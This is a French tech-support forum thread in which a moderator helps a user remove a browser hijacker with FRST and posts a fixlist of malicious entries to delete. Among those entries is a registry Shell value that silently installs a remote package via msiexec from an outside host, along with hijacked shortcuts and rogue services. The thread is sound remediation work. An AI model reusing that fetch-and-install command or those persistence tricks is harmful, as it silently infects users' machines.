Supprimer mystart.dealwifi

zirko123 Messages postés 67 Statut Membre -  
Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -
Bonjour, je voudrais me débarasser de mystart4dealwifi, j'ai utiliser plusieurs antimalware pour ca mais rien ne marche, est ce que vous avez déjà eu ce problème? autre chose, pkoi est ce que certains antispyware sont payants et d'autres pas?

Cyril

4 réponses

  1. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
     
    Salut,

    Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

    puis :

    Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

    Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
    • FRST.txt
    • Shortcut.txt
    • Additionnal.txt


    Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

    0
  2. zirko123 Messages postés 67 Statut Membre
     
    il faut lancer le scan et j'attends?
    0
    1. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
       
      oui pour avoir les rapports, voir explications du tuto.
      0
    2. zirko123 Messages postés 67 Statut Membre
       
      ok je viens de le faire, j'ai deux rapports qui se sont ouverts mais est ce que tu sais ou ils se sont logés que je te les envoie
      0
      1. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712 > zirko123 Messages postés 67 Statut Membre
         
        Ils se trouvent dans le même dossier que FRST qui doit se trouver sur le bureau, si tu as suivi le tuto.
        0
  3. zirko123 Messages postés 67 Statut Membre
     
    y'a rien sur mon bureau, en fait y'en a un seul et il est dans mes téléchargements, https://pjjoint.malekal.com/files.php?id=FRST_20170503_v15z11v5l8o14

    il t'en faut 3?
    0
    1. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
       
      oui il faut les 3..
      0
    2. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712 > zirko123 Messages postés 67 Statut Membre
       
      Donne le rapport Addition.txt ....
      0
    3. zirko123 Messages postés 67 Statut Membre
       
      en revanche il me manque le shortcut, veux tu que je recommence l'opération?
      0
  4. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
     
    Vas dans le Panneau de configuration
    puis programmes et fonctionnalités.

    Spybot - Search & Destroy
    SpyHunter 4
    Web Companion


    Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

    Ouvre le bloc-notes : Touche Windows + R,
    Dans le champs "Exécuter", saisir notepad et OK.
    Copie/Colle dedans ce qui suit :

    CreateRestorePoint:
    CloseProcesses:
    HKU\S-1-5-21-91746520-757560440-668047797-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YRkU1RUZQNTRSNkE5NkF1Mjq2FdM4NWM8RjM1NTkxNq%3D%3D /q [Pays US - 104.24.101.133]
    CHR Extension: (Bing) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-04-27]
    S4 SNARE; C:\Users\admin\AppData\Local\SNARE\Snare.dll [687616 2017-05-03] () [File not signed]
    R2 WinSAPSvc; C:\Users\admin\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [File not signed] <==== ATTENTION
    S2 MicrosoftCRLSrv; C:\ProgramData\Microsoft\IdentityCRL\production\ppcrlconfig617.dll [X]
    S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X]
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    S2 FirefoxU; C:\Program Files\Firefox\bin\FirefoxUpdate.exe [X] <==== ATTENTION
    S2 Kitty; C:\Users\admin\AppData\Local\Kitty\Kitty.dll [X] <==== ATTENTION
    2017-05-03 13:27 - 2017-05-03 13:27 - 00000000 ____D C:\ProgramData\SWCUTemp
    2017-05-02 23:21 - 2017-05-02 23:21 - 60107896 _____ (Malwarebytes ) C:\Users\admin\Downloads\mb3-setup-consumer-3.0.6.1469-10103 (1).exe
    2017-05-02 20:33 - 2017-05-02 21:24 - 00000194 _____ C:\Users\admin\Desktop\a faire.txt
    2017-04-28 15:27 - 2017-04-28 15:27 - 00000000 ____D C:\Users\admin\AppData\Local\Cuptony
    2017-04-28 15:26 - 2017-04-28 15:26 - 00000007 _____ C:\Windows\system32\81B5.tmp
    2017-04-28 15:21 - 2017-05-02 15:49 - 00000000 ____D C:\Users\admin\AppData\Roaming\WinSAPSvc
    2017-04-28 15:21 - 2017-04-28 15:21 - 00000000 ____D C:\Windows\psgo
    2017-04-28 15:21 - 2017-04-28 15:21 - 00000000 ____D C:\Program Files\Cuptony
    2017-04-27 20:40 - 2017-04-27 20:40 - 00000000 ____D C:\Program Files\Everness
    2017-04-27 20:32 - 2017-05-02 20:48 - 00002195 _____ C:\Users\Public\Desktop\Google Chrome.lnk
    2017-04-27 18:25 - 2017-04-27 18:25 - 00000000 ____D C:\Users\admin\AppData\Local\Everness
    2017-04-27 18:17 - 2017-05-02 15:48 - 00000000 ____D C:\Program Files\BiaoJi
    2017-04-25 23:34 - 2017-04-13 17:30 - 00001310 _____ C:\Users\admin\Desktop\lettre.txt
    2017-04-25 13:45 - 2017-04-25 13:45 - 00000000 _____ C:\Windows\system32\22
    2017-04-25 12:04 - 2017-04-25 12:04 - 00000000 ____D C:\ProgramData\Apple
    2017-04-25 12:03 - 2017-04-28 15:23 - 00000000 _____ C:\Windows\system32\33
    2017-04-25 12:03 - 2017-04-28 15:23 - 00000000 _____ C:\Windows\system32\11
    2017-04-25 12:00 - 2017-04-28 15:20 - 00000000 ____D C:\Program Files\AlphaGo
    2017-04-25 12:00 - 2017-04-28 15:19 - 00000000 ____D C:\Program Files\MK
    2017-04-23 11:24 - 2017-04-23 11:45 - 00013754 ____H C:\Users\admin\Desktop\~WRL1051.tmp
    2017-04-18 09:23 - 2017-04-18 09:23 - 60107896 _____ (Malwarebytes ) C:\Users\admin\Downloads\mb3-setup-consumer-3.0.6.1469-10103.exe
    2017-04-18 09:20 - 2017-04-18 09:20 - 04089296 _____ C:\Users\admin\Downloads\adwcleaner_6.045.exe
    2017-04-18 01:19 - 2017-04-18 01:19 - 00000000 ____D C:\Users\admin\AppData\Local\ASHelper
    2017-04-17 21:06 - 2017-04-17 21:06 - 00000000 ____D C:\Users\admin\AppData\Local\Eastness
    2017-04-17 21:06 - 2017-04-17 21:06 - 00000000 ____D C:\Program Files\temp
    2017-04-17 21:03 - 2017-04-17 21:03 - 00000000 ____D C:\Users\admin\AppData\Roaming\Firefox
    2017-04-17 21:03 - 2017-04-17 21:03 - 00000000 ____D C:\Users\admin\AppData\Local\Firefox
    2017-04-17 21:02 - 2017-05-03 13:27 - 00000000 ____D C:\Program Files\Firefox
    2017-04-17 21:02 - 2017-04-30 07:52 - 00000000 ____D C:\Users\admin\AppData\Local\Kitty
    2017-04-17 21:02 - 2017-04-25 12:02 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-17 21:01 - 2017-05-02 15:49 - 00000000 ____D C:\Users\admin\AppData\Local\SNARE
    2017-04-17 21:01 - 2017-04-28 15:25 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-17 21:01 - 2017-04-17 21:01 - 00000000 ____D C:\Program Files\MIO
    HKU\S-1-5-21-91746520-757560440-668047797-1000\...\ChromeHTML: -> "C:\Program Files\Cuptony\Application\chrome.exe" "%1" <==== ATTENTION
    C:\Program Files\Cuptony
    Task: {10EDE2BC-9839-490C-B802-235F2F77EAC5} - \PowerWord-SCT-JT -> No File <==== ATTENTION
    Task: {E19812B3-DA84-45D5-8082-478031E7F06C} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
    ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
    ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
    ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
    Hosts:
    EmptyTemp:
    RemoveProxy:
    Reboot:


    Une fois, le texte collé dans le Bloc-notes,
    Menu "Fichier" puis "Enregistrer sous",
    A gauche, place toi sur le Bureau,
    Dans le champs en bas, nom du fichier mets : fixlist.txt
    Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

    Relance FRST et clique sur le bouton "Corriger / Fix"
    Un redémarrage sera peut-être nécessaire ( pas obligatoire )
    Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

    Redémarre l'ordinateur.

    2°)
    Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

    3°)
    Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

    4°)
    Vois ce que cela donne et si des améliorations ont eu lieu.
    Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.

    Veuillez appuyer sur une touche pour continuer la désinfection...
    0